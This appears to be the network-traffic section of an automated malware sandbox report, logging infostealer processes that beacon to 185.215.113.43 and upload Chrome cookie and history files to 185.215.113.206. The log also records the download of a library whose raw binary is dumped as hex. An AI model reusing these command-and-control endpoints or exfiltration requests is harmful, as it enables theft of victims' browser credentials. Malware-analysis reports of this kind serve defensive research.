                                                                                                                                                                                                                                              Nov 2, 2024 07:16:40.185837030 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:40.185847998 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:40.185858965 CET636INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:40.185889959 CET948INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:40.185956955 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:40.186000109 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:40.186009884 CET1236INData Raw: dc a2 91 e7 5c c6 cc 03 c4 e5 03 ba 07 c9 cf f8 6c 4b cc bd c2 b9 dd 8b fc 75 df e2 13 86 c4 15 c7 ac 70 2d 0c ce d7 d9 d6 7b e2 a5 c8 7e ce 77 a3 d1 d4 20 62 77 c9 c9 47 7d c3 37 e5 51 0a e2 f0 93 cc 90 0c b3 36 e8 2b a2 fe cc c2 03 d9 b8 cf 6e
                                                                                                                                                                                                                                              Data Ascii: \lKup-{~w bwG}7Q6+nB<E1}Os4Cst4C3sDgKH15ds`bl}.&Dg85p31j]w~?,MQ$Ely
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:40.191282034 CET1236INData Raw: 05 98 5c 56 b0 7a ef f6 ea 85 e5 f8 f4 ba 11 d4 15 f5 59 d6 34 95 05 48 f6 97 15 2a 23 12 4e 60 7d ba 10 06 68 92 e4 66 e3 93 44 a1 87 07 df 17 0f 23 d1 f5 1b 5b 04 ae d8 c1 df 7f f7 3a 13 4c a8 c6 0b e3 89 b9 10 75 0e ea 90 97 b2 32 16 fa 7e b9
                                                                                                                                                                                                                                              Data Ascii: \VzY4H*#N`}hfD#[:Lu2~QieNgG]a@4J]<KmU2PVfD^e{%qYYj#i@i(W?.[T!<Y0d7T9B%&


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              14192.168.2.464006185.215.113.43805844C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:43.118263960 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 30 33 33 34 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                              Data Ascii: d1=1003346001&unit=246122658369
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:44.068114996 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:43 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              15192.168.2.46400734.107.221.82806864C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:43.581285000 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                              Host: detectportal.firefox.com
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:44.204663992 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Content-Length: 90
                                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                                              Date: Fri, 01 Nov 2024 16:02:58 GMT
                                                                                                                                                                                                                                              Age: 51226
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                              Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                              Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:44.960794926 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                              Host: detectportal.firefox.com
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:45.090656996 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Content-Length: 90
                                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                                              Date: Fri, 01 Nov 2024 16:02:58 GMT
                                                                                                                                                                                                                                              Age: 51227
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                              Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                              Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              16192.168.2.464030185.215.113.43805844C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:46.018861055 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:46.932012081 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:46 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              17192.168.2.464038185.215.113.206804136C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:48.182248116 CET629OUTPOST /6c4adf523b719729.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGH
                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 35 38 36 32 32 37 36 62 63 32 31 39 31 61 66 65 34 66 36 62 64 65 39 32 36 36 66 31 61 64 63 31 32 34 39 34 66 37 37 66 35 34 62 37 61 37 62 30 39 63 36 38 66 61 65 35 34 36 39 63 65 38 65 65 64 38 32 66 38 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: ------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="token"305862276bc2191afe4f6bde9266f1adc12494f77f54b7a7b09c68fae5469ce8eed82f89------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------IDBKKKKKFBGDGDHIDBGH--
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:49.626863003 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:48 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:49.752737045 CET203OUTPOST /6c4adf523b719729.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----FIDGHIIECGHDHJKFCAEG
                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                              Content-Length: 1451
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:49.752737045 CET1451OUTData Raw: 2d 2d 2d 2d 2d 2d 46 49 44 47 48 49 49 45 43 47 48 44 48 4a 4b 46 43 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 35 38 36 32
                                                                                                                                                                                                                                              Data Ascii: ------FIDGHIIECGHDHJKFCAEGContent-Disposition: form-data; name="token"305862276bc2191afe4f6bde9266f1adc12494f77f54b7a7b09c68fae5469ce8eed82f89------FIDGHIIECGHDHJKFCAEGContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:50.540574074 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:49 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:50.714006901 CET565OUTPOST /6c4adf523b719729.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----GIJKKKFCFHCFIECBGDHI
                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                              Content-Length: 363
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 35 38 36 32 32 37 36 62 63 32 31 39 31 61 66 65 34 66 36 62 64 65 39 32 36 36 66 31 61 64 63 31 32 34 39 34 66 37 37 66 35 34 62 37 61 37 62 30 39 63 36 38 66 61 65 35 34 36 39 63 65 38 65 65 64 38 32 66 38 39 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4b 4b 4b 46 43 46 48 43 46 49 45 43 42 47 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: ------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="token"305862276bc2191afe4f6bde9266f1adc12494f77f54b7a7b09c68fae5469ce8eed82f89------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GIJKKKFCFHCFIECBGDHIContent-Disposition: form-data; name="file"------GIJKKKFCFHCFIECBGDHI--
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:51.515491009 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:50 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:53.657543898 CET565OUTPOST /6c4adf523b719729.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----GDHCGDGIEBKJKFHJJKFC
                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                              Content-Length: 363
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 43 47 44 47 49 45 42 4b 4a 4b 46 48 4a 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 35 38 36 32 32 37 36 62 63 32 31 39 31 61 66 65 34 66 36 62 64 65 39 32 36 36 66 31 61 64 63 31 32 34 39 34 66 37 37 66 35 34 62 37 61 37 62 30 39 63 36 38 66 61 65 35 34 36 39 63 65 38 65 65 64 38 32 66 38 39 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 43 47 44 47 49 45 42 4b 4a 4b 46 48 4a 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 43 47 44 47 49 45 42 4b 4a 4b 46 48 4a 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: ------GDHCGDGIEBKJKFHJJKFCContent-Disposition: form-data; name="token"305862276bc2191afe4f6bde9266f1adc12494f77f54b7a7b09c68fae5469ce8eed82f89------GDHCGDGIEBKJKFHJJKFCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDHCGDGIEBKJKFHJJKFCContent-Disposition: form-data; name="file"------GDHCGDGIEBKJKFHJJKFC--
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:54.445280075 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:53 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:54.989926100 CET94OUTGET /746f34465cf17784/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:55.281598091 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:55 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                              ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Content-Length: 685392
                                                                                                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:55.281630993 CET212INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b
                                                                                                                                                                                                                                              Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:55.281687021 CET1236INData Raw: cc cc cc cc 55 89 e5 53 57 56 68 4f 01 00 00 e8 3f 0b 08 00 83 c4 04 85 c0 74 30 89 c7 89 80 38 01 00 00 83 c7 0f 31 f6 83 e7 f0 74 6b 8b 45 14 8b 55 10 8b 5d 0c 8b 4d 08 85 db 74 1f f2 0f 10 03 f2 0f 11 87 30 01 00 00 eb 25 68 13 e0 ff ff e8 f2
                                                                                                                                                                                                                                              Data Ascii: USWVhO?t081tkEU]Mt0%h1<40jRjjPQWt8^_[]UWVut }jVt8h^_]USWVPL$,M01D$H
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:55.281738043 CET1236INData Raw: 0c 89 c1 c1 e9 18 89 4c 24 10 c7 44 24 1c 00 00 00 00 89 44 24 08 c7 44 24 24 00 00 00 00 c7 44 24 20 00 00 00 00 31 d2 31 c9 89 5c 24 28 eb 24 89 c7 8b 44 24 1c 83 c0 01 83 f8 06 8b 54 24 18 8b 4c 24 14 0f 84 e2 01 00 00 89 44 24 1c 8a 44 24 07
                                                                                                                                                                                                                                              Data Ascii: L$D$D$D$$D$ 11\$($D$T$L$D$D$t$8D$D$@L$T$|$ L$$\$\$T$1%1%1T$D|$@|$t\$
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:55.281786919 CET1236INData Raw: 89 d9 0f b6 5d e7 09 d8 89 4d d4 29 c1 09 ca c1 fa 1f f7 db 83 e3 07 31 ff 39 d9 f7 d2 0f 44 fa 89 45 d0 89 45 dc 89 ca f7 da c1 fa 1f f7 d2 8b 45 1c 80 7c 30 f7 01 19 db 09 d3 b8 01 00 00 00 29 c8 c1 f8 1f 8b 55 1c 80 7c 32 f6 01 19 d2 f7 d0 09
                                                                                                                                                                                                                                              Data Ascii: ]M)19DEEE|0)U|2!!)]|3)|3!)}|7!!)U|2)|2!!)M|1t/E
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:55.281821012 CET636INData Raw: cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 68 0c 01 00 00 e8 bf fc 07 00 83 c4 04 31 f6 85 c0 74 6c 89 c7 8b 45 08 c7 47 08 00 00 00 00 89 47 04 8b 48 04 ff 15 00 80 0a 10 ff d1 89 07 85 c0 74 31 8b 55 0c 89 f9 ff 75 14 ff 75 10 e8 17 fd ff ff 83
                                                                                                                                                                                                                                              Data Ascii: USWVh1tlEGGHt1Uuut,tGHjSGW:G^_[]USWVUM]u>F9t:NVFMUtHHjWhjV4%t
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:55.281853914 CET1236INData Raw: ff d1 83 c4 0c 8b 37 8b 47 04 8b 48 14 8b 45 10 8b 18 ff 15 00 80 0a 10 53 8b 5d 0c 53 56 ff d1 83 c4 0c 8b 37 8b 47 04 8b 48 18 ff 15 00 80 0a 10 ff 75 14 ff 75 10 53 56 ff d1 83 c4 10 31 c0 83 c4 04 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56
                                                                                                                                                                                                                                              Data Ascii: 7GHES]SV7GHuuSV1^_[]USWVPh1tq]@CFECHut7FKSrQP;KqSPVi^_[]Uh
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:55.281887054 CET1236INData Raw: 04 02 0f b6 c8 8b 7d f0 8a 14 0f 00 d6 0f b6 f6 8a 24 37 88 24 0f 88 14 37 8b 75 14 00 d4 0f b6 cc 8b 5d 10 8a 53 01 32 14 0f 8b 4d e4 88 51 01 83 fe 02 0f 84 e8 00 00 00 8b 45 ec 04 03 0f b6 c8 8b 7d f0 8a 14 0f 00 d6 0f b6 f6 8a 24 37 88 24 0f
                                                                                                                                                                                                                                              Data Ascii: }$7$7u]S2MQE}$7$7u]S2MQE}$7$7u]S2MQttE}$7$7u]S2MQt<E}
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:55.281919956 CET424INData Raw: 74 09 0f b6 46 02 c1 e0 10 09 c1 89 4d e0 8a 55 e8 8b 45 d0 8b 4d ec 83 c7 04 e9 29 01 00 00 66 0f ef c9 66 0f 6f 05 c0 20 08 10 31 f6 66 0f ef d2 f6 c2 01 0f 84 9b 00 00 00 66 0f 6f 1d d0 20 08 10 66 0f fe d8 0b 75 cc 8b 45 10 66 0f 6e 2c 30 66
                                                                                                                                                                                                                                              Data Ascii: tFMUEM)ffo 1ffo fuEfn,0fnd0ff`faf`fafrfo5 f[fpffpfpffpfbffrf[fpffpfpffpfbfffpffpUff~MU
